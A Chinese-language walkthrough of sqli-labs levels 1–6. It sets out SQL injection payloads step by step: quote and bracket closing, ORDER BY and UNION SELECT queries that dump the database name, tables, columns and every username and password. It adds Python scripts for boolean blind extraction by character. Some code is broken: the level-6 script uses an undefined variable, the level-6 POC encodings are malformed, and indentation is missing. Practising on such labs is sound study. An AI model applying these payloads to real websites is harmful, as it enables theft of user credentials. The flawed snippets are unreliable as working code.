1、第一关
测试id=1
id=1'加一个引号报错,两个引号正常,应该是字符,还有回显
猜测字段长度
id=1' order by 3 --+
id=1' order by 4 --+
字段长度为三,接下来确定位置:id=1' and 1=2 union select 1,2,3 --+
查出库名,及版本号id=1' and 1=2 union select 1,database(),version() --+
接下来爆出所有表名
id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
猜测账号密码应该在users表中,爆出所有字段
id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
接下来爆出所有账号
id=1' and 1=2 union select 1,2,group_concat(id,':',username,'>',password) from users--+
2、第二关
id=1,加单引号报错,双引号不报错,应该也是数字型注入
select * from userswhere id=$id' limit 0,1报错
select * from userswhere id=$id limit 0,1不报错
,接下来和第一关一样
id=1 and 1=2 union select 1,2,3 --+ 猜测查询字段长度
id=1 and 1=2 union select 1,database(),version() --+ 查出库名,及版本号
id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ 爆出所有表名
id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ 爆出所有字段
id=1 and 1=2 union select 1,2,group_concat(id,':',username,'>',password) from users--+ 爆出所有账号
3、第三关
id=1'时报错,看到有括号,应该给他闭合
id=1') --+
接下来和第一关差不多
id=1') and 1=2 union select 1,2,3 --+ 猜测查询字段长度
id=1') and 1=2 union select 1,database(),version() --+ 查出库名,及版本号
id=1') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ 爆出所有表名
id=1') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ 爆出所有字段
id=1') and 1=2 union select 1,2,group_concat(id,':',username,'>',password) from users--+ 爆出所有账号
4、第四关
id=1"根据报错猜测应该是双引号加括号闭合
接下来步骤类似第一关
id=100") union select 1,2,3 --+ 猜测查询字段长度
id=100") union select 1,database(),version() --+ 查出库名,及版本号
id=100") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ 爆出所有表名
id=100") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ 爆出所有字段
id=100") union select 1,2,group_concat(id,':',username,'>',password) from users--+ 爆出所有账号
5、第五关
id=1显示如下
id=1'会报错
id=100不显示
初步猜测应该是布尔注入
先试试能否爆出数据库长度
id=1' and length(database())>0--+
初步判断数据库长度应该是8
接下来尝试爆库id=1 and substr(database(),1,1)="a" --+
一个位置一个位置爆
爆出第一个位置是s,8次就可爆出,也可以利用脚本爆库security
import requests
def get_database(po, cha):
url = f"http://sqli.labs/Less-5/?id=1%27%20and%20substr(database(),{po},1)=\"{cha}\"%20--+"
res = requests.get(url)
content_length = len(res.text)
if content_length == 704:
print(cha)
if __name__ == '__main__':
for po in [1, 2, 3, 4, 5, 6, 7, 8]:
for cha in [chr(97 + i) for i in range(26)]:
get_database(po, cha)接下来爆出所有表名
id=1%27%20and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{po},1)=\"{cha}\"%20--+
def get_all_tables(po, cha):
url = f"http://sqli.labs/Less-5/?id=1%27%20and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{po},1)=\"{cha}\"%20--+"
res = requests.get(url)
content_length = len(res.text)
if content_length == 704:
if cha == ',':
print("==========================================================================")
else:
print(cha, end='')
if __name__ == '__main__':
# 假设所有表名长度之和100
list = [chr(97 + i) for i in range(26)]
list2 = [","]+list
for po in range(100):
for cha in list2:
get_all_tables(po, cha)
接着爆users表里的字段
http://sqli.labs/Less-5/?id=1%27%20and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{po},1)=\"{cha}\"%20--+
def get_all_columns(po, cha):
url = f"http://sqli.labs/Less-5/?id=1%27%20and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{po},1)=\"{cha}\"%20--+"
res = requests.get(url)
content_length = len(res.text)
if content_length == 704:
if cha == ',':
print(",", end='')
else:
print(cha, end='')
if __name__ == '__main__':
# 假设所有字段名长度之和500
list = [chr(97 + i) for i in range(26)]
list2 = [","]+list
for po in range(500):
for cha in list2:
get_all_columns(po, cha)
接下来就是爆出所有账号密码
http://sqli.labs/Less-5/?id=1%27%20and%20substr((select group_concat(username,'>',password) from users),{po},1)=\"{cha}\"%20--+
def get_all_username_password(po, cha):
url = f"http://sqli.labs/Less-5/?id=1%27%20and%20substr((select group_concat(username,'>',password) from users),{po},1)=\"{cha}\"%20--+"
res = requests.get(url)
content_length = len(res.text)
if content_length == 704:
if cha == ',':
print(",", end='')
else:
print(cha, end='')
if __name__ == '__main__':
list = [chr(97 + i) for i in range(26)]
list2 = [1, 2, 3, 4, 5, 6, 7, 8, 9, ",", ">", "-"]+list #这里可以吧各种字符都加上
for po in range(500):
for cha in list2:
get_all_username_password(po, cha)
6、第六关
http://sqli.labs/Less-6/?id=1"双引号报错
这关与第五关类似,只是单引号改成双引号,正确的反馈长度是702
先爆库
http://sqli.labs/Less-6/?id=1%22%20and%20substr(database(),{p},1)=%22{a}%22%20--+
def get_database_name(p, a):
url = f"http://sqli.labs/Less-6/?id=1%22%20and%20substr(database(),{p},1)=%22{a}%22%20--+"
res = requests.get(url)
content_length = len(res.text)
if content_length == 702:
if cha == ',':
print(",", end='')
else:
print(cha, end='')
if __name__ == '__main__':
list = [chr(97 + i) for i in range(26)]
list2 = [1, 2, 3, 4, 5, 6, 7, 8, 9, ",", ">", "-"]+list #这里可以吧各种字符都加上
for po in range(20):
for cha in list2:
get_database_name(po, cha)
接下来步骤和第五关类似,只要把单引号改成双引号,返回内容长度改成702即可
%27是单引号,%22是双引号,%20是空格
爆表名POC:id=1%22%20and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{po},1)=22%{cha}22%%20--+
爆users表里的字段POC:id=1%22%20and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{po},1)=22%{cha}22%%20--+
爆出所有账号密码POC:id=1%22%20and%20substr((select group_concat(username,'>',password) from users),{po},1)=22%{cha}22%%20--+
